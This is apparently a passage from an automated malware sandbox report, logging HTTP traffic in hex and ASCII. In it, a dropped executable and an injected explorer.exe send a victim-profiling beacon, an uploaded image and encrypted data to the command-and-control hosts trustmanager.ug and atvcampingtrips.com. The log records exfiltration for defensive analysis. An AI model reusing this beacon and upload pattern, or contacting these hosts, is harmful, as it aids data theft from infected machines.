3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:01.938394070 CEST	15834	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0
Aug 23, 2021 02:09:02.029066086 CEST	15835	OUT	POST /k8FppT/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----144fedd53f2aeee09aa4dbce6b6e9e32 Host: trustmanager.ug Content-Length: 93811 Cache-Control: no-cache
Aug 23, 2021 02:09:02.029148102 CEST	15835	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 31 34 34 66 65 64 64 35 33 66 32 61 65 65 65 30 39 61 61 34 64 62 63 65 36 62 36 65 39 65 33 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 Data Ascii: ------144fedd53f2aeee09aa4dbce6b6e9e32Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
Aug 23, 2021 02:09:02.029349089 CEST	15845	OUT	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
Aug 23, 2021 02:09:02.029524088 CEST	15847	OUT	Data Raw: fc b8 7d 9b c9 ce ef 61 bb 38 fc 36 fb d7 05 6e 78 a7 24 df de ff 00 c9 7e 67 55 3e 56 d2 b2 fc 3f cc f9 57 53 55 4d 4a 50 a0 01 90 70 3e 82 aa 55 cd 57 fe 42 53 7e 1f c8 55 3c 57 44 be 26 73 2d 84 a5 a5 a5 34 80 6d 14 b4 b8 a0 06 f6 a5 c5 3b 14 Data Ascii: }a86nx$~gU>V?WSUMJPp>UWBS~U<WD&s-4m;b1KN&(1K)h(bSEv1@;EE%bRPbbPRQv((PF)h4} wLT!Z,;SIVb\mbIv(SIV
Aug 23, 2021 02:09:02.054672003 CEST	15853	OUT	Data Raw: 96 28 a1 96 48 a4 48 e6 52 d1 3b 29 02 40 09 04 a9 ee 32 08 e3 b8 ac 29 50 a7 4a 72 94 34 6f 7f c4 b9 d4 9c e2 94 ba 11 d1 56 ae 34 db fb 48 9e 5b 9b 1b 98 63 49 8c 0e f2 42 ca 16 40 32 50 92 38 6c 73 8e b4 eb 6d 23 53 bc fb 3f d9 74 db c9 fe d2 Data Ascii: (HHR;)@2)PJr4oV4H[cIB@2P8lsm#S?tyP3, rq"KVn4BP}UEKtH=o*[67Vs#b`84]VZ$IN^4}BVd{D__k]Mq!{Ic-AuV2yo$d
Aug 23, 2021 02:09:02.054815054 CEST	15858	OUT	Data Raw: c6 62 8a 7d 18 a2 c1 71 84 53 76 d4 98 a4 22 90 5c 8c 8a 42 2a 4c 53 71 4a c5 26 47 8a 4c 54 b8 a6 e2 a6 c5 5c 8f 14 62 a4 c5 37 14 ac 3b 8c c5 18 a7 d2 11 49 a1 dc 66 28 c5 2e 28 c5 2b 0e e3 48 a4 c5 3b 14 62 8b 00 cc 52 11 4f a4 c5 49 57 19 8a Data Ascii: b}qSv"\B*LSqJ&GLT\b7;If(.(+H;bROIW1OqAXbv))Rb7bE'zLRJ1@b(m8CK@"-BTF[#9Ss9B.Odg+jz}???XrWSG#V
Aug 23, 2021 02:09:02.055051088 CEST	15864	OUT	Data Raw: 6e 73 8c ef c6 58 1e bc e2 bc e2 0d 5f 55 b5 6b 43 6d 7c f0 9b 48 24 b7 80 c6 00 29 1c 9b 8b 8c e3 9c ef 6e 4f 23 3c 74 14 c5 d4 b5 24 b0 5b 15 bb c5 a8 b5 6b 41 1f 96 bf ea 9a 4f 34 ae 71 9f bf ce 7a f6 e9 c5 29 52 a9 b2 da ef f5 5f e5 f8 8d 54 Data Ascii: nsX_UkCm\|H$)nO#<t$[kAO4qz)R_T{/Yi[2jCcxg=[:vqFoH3k[2[WN3{f][VioK.f*U9cb97w7:>w1y<%)-?~mWd+5j
Aug 23, 2021 02:09:02.057285070 CEST	15874	OUT	Data Raw: 03 03 f4 a9 6d 2e a6 b2 ba 8e e6 06 db 24 67 20 f6 f7 07 d4 11 c1 15 ed cb 2e a4 e9 72 75 bd ef fd 74 3c 28 e6 35 55 5e 7e 96 b5 bf ae a7 b6 5a 6b 76 fa fc 3e 1f be 83 00 b5 e3 2c 91 e7 25 1c 5b cd 91 fe 7b 57 8b 7c 67 ff 00 92 87 37 fd 7b 45 fc Data Ascii: m.$g .rut<(5U^~Zkv>,%[{W\|g7{EdI$@? fPxPT1k~Wuo{QA )hBIESs@rl<RE.iZZniAisLh/zu\@4)V$PwsN8vUSd&
Aug 23, 2021 02:09:02.080133915 CEST	15879	OUT	Data Raw: f9 7a 6c bd 63 02 9a 74 bd 3a 41 f2 b6 da cf 57 3e 94 f5 73 53 c9 25 b3 2d 54 83 de 25 93 a0 40 df 72 5a 89 fc 3b 27 f0 48 0d 0b 2b 03 c1 35 2a dd 4a 3f 8c d1 7a ab a8 72 50 7b c4 a6 fa 1d d2 f4 50 6a 16 d3 6e 53 ac 4d 5a eb 7d 30 ea d5 32 ea 2f Data Ascii: zlct:AW>sS%-T%@rZ;'H+5*J?zrP{PjnSMZ}02/Gzdv5DO>`)^kW\|V;qBr\R$pjLLVGu.(RQbu2DPbv).}cuZxm$iR
Aug 23, 2021 02:09:02.080265999 CEST	15885	OUT	Data Raw: d7 d7 b0 5e 5a c7 06 a1 69 a9 5d 5b ea 91 5c c9 96 6d f0 2a 3a 18 d5 4a 95 2e 3d 0d 7c ef f1 33 c1 31 f8 4b 57 82 7b 11 22 e9 7a 80 69 2d 56 47 56 64 c6 37 2e 55 8e 54 6e 5c 13 ce 0f 7c 64 ef 4a b3 7a 33 1a 94 92 d5 1c 4e f3 eb 46 e3 eb 4d a2 b7 Data Ascii: ^Zi][\m:J.=\|31KW{"zi-VGVd7.UTn\\|dJz3NFM2.d?yyRvC[i(!kz2fDkQGKkSs0sz)8,\|oZ4]${ztf;n4Q!ro74}E\|.XSZDD
Aug 23, 2021 02:09:02.080369949 CEST	15890	OUT	Data Raw: 97 38 a7 8a 60 a7 e2 93 2e 3b 0e 1e f4 fe f4 c1 4f 02 a4 d2 23 85 3b 34 c1 4e a9 2d 0f 14 f1 4c 14 f5 18 35 0c d6 24 83 a5 38 53 05 3c 54 1a 21 e0 d4 8a 73 51 d3 85 43 35 8b 26 14 f1 51 a9 c5 48 a7 35 9b 35 4c 75 3c 74 a6 0a 78 c5 4b 34 43 c5 38 Data Ascii: 8`.;O#;4N-L5$8S<T!sQC5&QH55Lu<txK4C8S8Ty&B]SydJw<L5[o^LmHzg#zIt'k+],2}EmFP%7i(#.\|z@[4.r$8>208
Aug 23, 2021 02:09:02.133645058 CEST	15930	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:02.133661032 CEST	15930	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
59	192.168.2.3	49786	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:02.157072067 CEST	15930	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:02.183234930 CEST	15932	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:02.183257103 CEST	15932	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.3	49717	222.236.49.124	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:08:03.505881071 CEST	2099	OUT	POST /upload/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://atvcampingtrips.com/upload/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 345 Host: atvcampingtrips.com
Aug 23, 2021 02:08:03.506431103 CEST	2100	OUT	Data Raw: 39 6e 51 18 83 cb 1e 26 db af c9 71 00 01 7f bc 7d 7e ca 94 63 73 e5 16 0f 7e 78 e2 32 c5 ce 6e ef 29 b4 20 76 65 2b 1a ef 97 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1b 1d c7 41 20 ff 2c 5b 09 6b 2c 90 f4 76 0b 75 73 28 fa ea Data Ascii: 9nQ&q}~cs~x2n) ve+?*$`7C[zqNA ,[k,vus(Pho\|;,-6#~^bcR@X`Z1}t,2&w_EG~'oKjW=(Vs$m%}mls]R9
Aug 23, 2021 02:08:07.638027906 CEST	2808	IN	HTTP/1.0 404 Not Found Date: Mon, 23 Aug 2021 00:08:06 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 334 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 70 6c 6f 61 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML 